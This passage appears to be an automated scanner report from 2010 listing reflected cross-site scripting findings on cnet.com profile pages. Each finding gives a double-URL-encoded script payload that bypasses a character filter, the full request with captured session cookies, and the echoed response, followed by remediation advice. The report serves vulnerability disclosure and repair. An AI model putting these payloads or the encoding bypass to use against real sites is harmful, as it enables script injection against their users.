Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:06:53 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:06:53 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=959
Connection: Keep-Alive
Content-Length: 31084
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>doreilly34f7d<script>alert(1)</script>fc7d096905d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5966d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e76e02de3b33 was submitted in the REST URL parameter 2. This input was echoed as 5966d"><script>alert(1)</script>76e02de3b33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/doreilly5966d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e76e02de3b33/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:06:51 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:06:51 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=977
Connection: Keep-Alive
Content-Length: 31072
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="doreilly5966d"><script>alert(1)</script>76e02de3b33"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea481%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef185a55c57b was submitted in the REST URL parameter 2. This input was echoed as ea481"><script>alert(1)</script>f185a55c57b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/dujmovicaea481%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef185a55c57b/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:06:45 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:06:46 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=979
Connection: Keep-Alive
Content-Length: 31090
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="dujmovicaea481"><script>alert(1)</script>f185a55c57b"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 822d6%253cscript%253ealert%25281%2529%253c%252fscript%253e29e2d4bfcb5 was submitted in the REST URL parameter 2. This input was echoed as 822d6<script>alert(1)</script>29e2d4bfcb5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/dujmovica822d6%253cscript%253ealert%25281%2529%253c%252fscript%253e29e2d4bfcb5/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:06:47 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:06:47 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=984
Connection: Keep-Alive
Content-Length: 31055
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>dujmovica822d6<script>alert(1)</script>29e2d4bfcb5's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a5c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e37fd1b8b8a7 was submitted in the REST URL parameter 2. This input was echoed as 2a5c8"><script>alert(1)</script>37fd1b8b8a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/efranklin2a5c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e37fd1b8b8a7/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:10 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:10 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=954
Connection: Keep-Alive
Content-Length: 31123
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="efranklin2a5c8"><script>alert(1)</script>37fd1b8b8a7"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6aae5%253cscript%253ealert%25281%2529%253c%252fscript%253e0242d66e54e was submitted in the REST URL parameter 2. This input was echoed as 6aae5<script>alert(1)</script>0242d66e54e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/efranklin6aae5%253cscript%253ealert%25281%2529%253c%252fscript%253e0242d66e54e/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:11 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:11 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=954
Connection: Keep-Alive
Content-Length: 31013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>efranklin6aae5<script>alert(1)</script>0242d66e54e's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c064e%253cscript%253ealert%25281%2529%253c%252fscript%253e475aea1f3e9 was submitted in the REST URL parameter 2. This input was echoed as c064e<script>alert(1)</script>475aea1f3e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/elinormillsc064e%253cscript%253ealert%25281%2529%253c%252fscript%253e475aea1f3e9 HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:59 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:59 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Length: 31058
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>elinormillsc064e<script>alert(1)</script>475aea1f3e9's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7411%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef9f22c8f48c was submitted in the REST URL parameter 2. This input was echoed as d7411"><script>alert(1)</script>f9f22c8f48c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/elinormillsd7411%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef9f22c8f48c HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:58 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:58 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=938
Connection: Keep-Alive
Content-Length: 31087
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="elinormillsd7411"><script>alert(1)</script>f9f22c8f48c"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5380%253cscript%253ealert%25281%2529%253c%252fscript%253e5a44f1ca9cf was submitted in the REST URL parameter 2. This input was echoed as c5380<script>alert(1)</script>5a44f1ca9cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/elinormillsc5380%253cscript%253ealert%25281%2529%253c%252fscript%253e5a44f1ca9cf/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:00 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:00 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=975
Connection: Keep-Alive
Content-Length: 31057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>elinormillsc5380<script>alert(1)</script>5a44f1ca9cf's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bfa9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e396af8c8659 was submitted in the REST URL parameter 2. This input was echoed as 4bfa9"><script>alert(1)</script>396af8c8659 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/elinormills4bfa9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e396af8c8659/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:06:58 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:06:58 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=958
Connection: Keep-Alive
Content-Length: 31083
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="elinormills4bfa9"><script>alert(1)</script>396af8c8659"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70c3f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed387a8463bf was submitted in the REST URL parameter 2. This input was echoed as 70c3f"><script>alert(1)</script>d387a8463bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ericaatnews70c3f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed387a8463bf/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:07:18 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:07:18 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=981
Connection: Keep-Alive
Content-Length: 31114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]...
<input type="hidden" name="profileName" value="ericaatnews70c3f"><script>alert(1)</script>d387a8463bf"/>
...[SNIP]...
